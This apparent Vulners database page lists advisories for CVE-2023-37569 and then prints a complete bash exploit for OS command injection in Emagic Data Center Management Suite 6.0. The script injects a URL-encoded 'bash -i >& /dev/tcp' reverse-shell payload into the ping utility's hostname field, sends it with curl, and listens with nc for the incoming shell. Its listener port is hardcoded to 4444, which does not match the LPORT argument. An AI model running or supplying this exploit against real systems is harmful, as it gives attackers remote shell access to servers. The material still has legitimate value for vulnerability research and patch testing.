| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Emagic Data Center Management Suite v6.0 - OS Command Injection Exploit | 8 Aug 202300:00 | – | zdt | |
| ESDS Emagic Data Center Management Suit Operating System Command Injection Vulnerability | 8 Aug 202300:00 | – | cnnvd | |
| CVE-2023-37569 | 8 Aug 202308:04 | – | cve | |
| CVE-2023-37569 OS Command Injection Vulnerability in Emagic Data Center Management Suite | 8 Aug 202308:04 | – | cvelist | |
| CVE-2023-37569 | 8 Aug 202309:15 | – | nvd | |
| Emagic Data Center Management Suite 6.0 Remote Command Execution | 9 Aug 202300:00 | – | packetstorm | |
| Design/Logic Flaw | 8 Aug 202309:15 | – | prion | |
| PT-2023-26027 · Esds · Esds Emagic Data Center Management Suit | 8 Aug 202300:00 | – | ptsecurity | |
| CVE-2023-37569 | 13 Feb 202519:34 | – | redhatcve | |
| CVE-2023-37569 OS Command Injection Vulnerability in Emagic Data Center Management Suite | 8 Aug 202308:04 | – | vulnrichment |
#!/bin/bash
# Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection
# Date: 03-08-2023
# Exploit Author: Shubham Pandey & thewhiteh4t
# Vendor Homepage: https://www.esds.co.in/enlight360
# Version: 6.0.0
# Tested on: Kali Linux
# CVE : CVE-2023-37569
URL=$1
LHOST=$2
LPORT=$3
echo "*****************************"
echo "* ESDS eMagic 6.0.0 RCE *"
echo "* > CVE-2023-37569 *"
echo "* > Shubham & thewhiteh4t *"
echo "*****************************"
if [ $# -lt 3 ]; then
echo """
USAGE :
./exploit.sh http://<IP> <LHOST> <LPORT>
./exploit.sh http://192.168.0.10 192.168.0.20 1337
"""
exit 1
fi
url="$1/index.php/monitor/operations/utilities/"
echo "[+] URL : $URL"
echo "[+] LHOST : $LHOST"
echo "[+] LPORT : $LPORT"
echo
payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27"
post_data="utility=ping&operations=yes&hostname=%3B%20$payload¶m_before=¶m_after=&probe_id=1&rndval=1682490204846"
echo "[!] Triggering exploit..."
echo $url
(sleep 3; curl -s -X POST -d $post_data $url > /dev/null) &
echo "[+] Catching shell..."
nc -lvp 4444Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation